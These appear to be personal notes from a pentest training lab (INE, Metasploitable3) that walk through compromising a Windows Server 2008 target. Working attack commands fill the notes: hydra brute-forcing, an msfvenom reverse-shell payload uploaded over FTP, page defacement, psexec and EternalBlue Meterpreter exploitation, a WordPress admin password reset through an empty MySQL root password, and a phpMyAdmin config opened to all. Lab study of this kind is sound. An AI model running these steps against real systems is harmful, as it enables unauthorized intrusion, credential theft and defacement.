🔬Win Black Box Pentest
🔬 INE LAB - Metasploitable3
Target IP:
10.2.29.246Metasploit Framework is permitted
Port Scanning & Enumeration
Obtain the target
IPaddress from the/etc/hostsfile
cat /etc/hosts
10.2.29.246 demo.ine.local
ping 10.2.29.246
ping demo.ine.local
cd Desktop
mkdir Win2k8
cd WiWin2k8/ # To store all the notes and files about the targetPort scanning with
nmap
nmap -sV 10.2.29.246
# Scans 1000 common ports21/tcp open ftp Microsoft ftpd
22/tcp open ssh OpenSSH 7.1 (protocol 2.0)
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp open mysql MySQL 5.5.20-log
4848/tcp open ssl/http Oracle Glassfish Application Server
7676/tcp open java-message-service Java Message Service 301
8080/tcp open http Sun GlassFish Open Source Edition 4.0
8181/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp open wap-wsp?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windowsPerform an advanced
nmapscan and export it into anxmlfile
nmap -T4 -PA -sC -sV -p 1-10000 10.2.29.246 -oX nmap_10k
# -T4 = Aggressive speed scan
# -PA = TCP ACK discovery
# -sC = default NSE scripts
# -sV = service version detection
# -p 1-10000 = ports range
# -oX = XML output file
# A full port range scan can be also done, not necessary here
# nmap -T4 -PA -sC -sV -p- 10.2.29.246 -oX nmap_alle.g.Extranmapuseful scans commands
nmap -T4 -PA -sC -sV -p- 10.2.29.246 -oX nmap_all
nmap -sU -sV 10.2.29.246 -oX nmap_udp
Access the web server with a browser
http://10.2.29.246/http://10.2.29.246/hahaha.jpgView page source
Banner grabbing on some services
nc -nv 10.2.29.246 21
220 Microsoft FTP ServiceOther webpages
https://10.2.29.246:4848/http://10.2.29.246:8080/http://10.2.29.246:9200/http://10.2.29.246:8484/http://10.2.29.246:8585/http://10.2.29.246:8585/wordpress/
SMB Enumeration
Import scan results in MSF by creating a dedicated workspace
service postgresql start && msfconsoledb_status
workspace -a Win2k8
setg RHOST 10.2.29.246
setg RHOSTS 10.2.29.246
db_import nmap_10khosts
services
use auxiliary/scanner/smb/smb_version
run
hosts
# Name of computer is correct nowTargeting
nmap -sV -sC -p21,80 10.2.29.246
# FTP is part of the Microsoft IIS package Try
anonymous:anonymouswith FTP
ftp 10.2.29.246
Brute-force the FTP server
hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.29.246 ftp
hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_users.txt 10.2.29.246 ftp -I[21][ftp] host: 10.2.29.246 login: administrator password: vagrant
[21][ftp] host: 10.2.29.246 login: vagrant password: vagrant
📌 2 FTP users:
administrator:vagrant
vagrant:vagrant
ftp 10.2.29.246
# Use administrator:vagrant
ls
229 Entering Extended Passive Mode (|||49567|)
125 Data connection already open; Transfer starting.
10-28-21 07:22AM <DIR> aspnet_client
10-28-21 07:19AM 28 caidao.asp
10-28-21 07:18AM 34251 hahaha.jpg
10-28-21 07:18AM 1116928 index.html
10-28-21 07:18AM 2439511 seven_of_hearts.html
10-28-21 07:18AM 384916 six_of_diamonds.zip
10-28-21 07:22AM 184946 welcome.png
# Web server home directoryIIS can execute
.aspfilesGenerate an
.aspreverse shell payload and upload it with FTP
cd Desktop/Win2k8/
ip -br -c a
10.10.24.4/24
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.24.4 LPORT=1234 -f asp > shell.aspxftp 10.2.29.246
# use vagrant:vagrant
put shell.aspxBack to the
msfconsolesession tab
use multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.24.4
set LPORT 1234Open the browser and navigate to
10.2.29.246/shell.aspx
In this case the reverse shell don't work.
The next step of an attacker can be to deface the website - modifying the web application
ftp 10.2.29.246
get index.html
# modify the index.html than upload the edited web page
put index.htmlObtain the new target IP if the lab was restarted.
Target IP:
10.2.16.83Based on the FTP Enumeration:
administrator:vagrant
vagrant:vagrant
nmap -sV -sC -p 22 10.2.16.8322/tcp open ssh OpenSSH 7.1 (protocol 2.0)
| ssh-hostkey:
| 2048 83:56:2e:69:b5:2d:b4:9a:e4:7f:97:86:d8:bc:ae:7b (RSA)
|_ 521 c0:e2:da:9d:e2:1e:58:09:7e:80:07:ec:3e:b4:57:f5 (ECDSA)searchsploit OpenSSH 7.1
# Use username enumeration if neededBrute-force SSH
hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_users.txt 10.2.16.83 ssh
hydra -l administrator /usr/share/wordlists/metasploit/unix_users.txt 10.2.16.83 ssh
# No valid password for SSH - administrator[22][ssh] host: 10.2.16.83 login: vagrant password: vagrant
User SSH login can be tried
ssh [email protected]
# vagrant:vagrant
# WORKS!
ssh [email protected]
# administrator:vagrant
# DOES NOT work!
net localgroup administrators
# "vagrant" is in the Administrators Group
Obtain a
Meterpretersession
msfconsoleuse auxiliary/scanner/ssh/ssh_login
setg RHOST 10.2.16.83
setg RHOSTS 10.2.16.83
set USERNAME vagrant
set PASSWORD vagrant
run
session 1
# CTRL+Z to background
sessions -u 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
# The manual msfvenom payload upload can be triedBack on the SSH session
bash
net localgroup administrators
whoami /priv
Target IP:
10.2.26.45Based on the FTP & SSH Enumeration:
administrator:vagrant- FTP
vagrant:vagrant- FTP + SSH
nmap -sV -sC -p 445 10.2.26.45445/tcp open microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
Brute-force SMB
hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.26.45 smb
hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.26.45 smb[445][smb] host: 10.2.26.45 login: administrator password: vagrant
[445][smb] host: 10.2.26.45 login: vagrant password: vagrant
Enumerate shares
smbclient -L 10.2.26.45 -U vagrant
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPCsmbmap -u vagrant -p vagrant -H 10.2.26.45
[+] IP: 10.2.26.45:445 Name: demo.ine.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ READ, WRITE Remote Admin
C$ READ, WRITE Default share
IPC$ NO ACCESS Remote IPCEnumerate others system user accounts
enum4linux -u vagrant -p vagrant -U 10.2.26.45user:[Administrator]
user:[anakin_skywalker]
user:[artoo_detoo]
user:[ben_kenobi]
user:[boba_fett]
user:[chewbacca]
user:[c_three_pio]
user:[darth_vader]
user:[greedo]
user:[Guest]
user:[han_solo]
user:[jabba_hutt]
user:[jarjar_binks]
user:[kylo_ren]
user:[lando_calrissian]
user:[leia_organa]
user:[luke_skywalker]
user:[sshd]
user:[sshd_server]
user:[vagrant]
Enumerate users with MSF
msfconsoleuse auxiliary/scanner/smb/smb_enumusers
set RHOSTS 10.2.26.45
set SMBUser vagrant
set SMBPass vagrant
run[+] 10.2.26.45:445 - VAGRANT-2008R2 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )In a new terminal, use
psexec.pyto try SMB authentication
locate psexec.py
cp /usr/share/doc/python3-impacket/examples/psexec.py .
chmod +x psexec.pypython3 psexec.py [email protected]
Obtain a
Meterpretersession with MSF
msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS 10.2.26.45
set SMBUser Administrator
set SMBPass vagrant
set payload windows/x64/meterpreter/reverse_tcp
run
If no account credentials can be found, use the EternalBlue vulnerability exploit since the system target is a Win Server 2008 R2
msfconsole -quse exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 10.2.26.45
run
MySQL
nmap -sV -sC -p 3306,8585 10.2.26.453306/tcp open mysql MySQL 5.5.20-log
8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
Search for MySQL exploits
searchsploit MySQL 5.5
# There are only Privilege Escalation exploitsBrute-force MySQL
msfconsoleuse auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved!
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'📌
rootpassword is empty
mysql -u root -p -h 10.2.26.45
show databases;
use wordpress;
show tables;
select * from wp_users;
Change
adminWordPress user's password
❗ DO NOT Change passwords in a real pentest
UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';Access via browser
http://10.2.26.45:8585/wordpress/wp-admin
Try to gain access to phpMyAdmin using MSF
Access the target through SMB and modify phpMyAdmin configuration file
# Open the MSF tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
runsysinfoMove into the
wampfolder
cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php
Change WordPress
adminpassword
cd C:\\wamp\\alias
download phpmyadmin.conf
# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# modify it by deleting the lines under "AllowOverride all" and insert
Allow from all
# Write and close
# In the MSFconsole
upload phpmyadmin.conf
# Apache service must be restarted
shell
net stop wampapache
net start wampapacheAccess phpMyAdmin
http://10.2.26.45:8585/phpmyadmin/it automatically logs in since the
rootpassword isnull
❗ DO NOT Change passwords in a real pentest
Last updated
Was this helpful?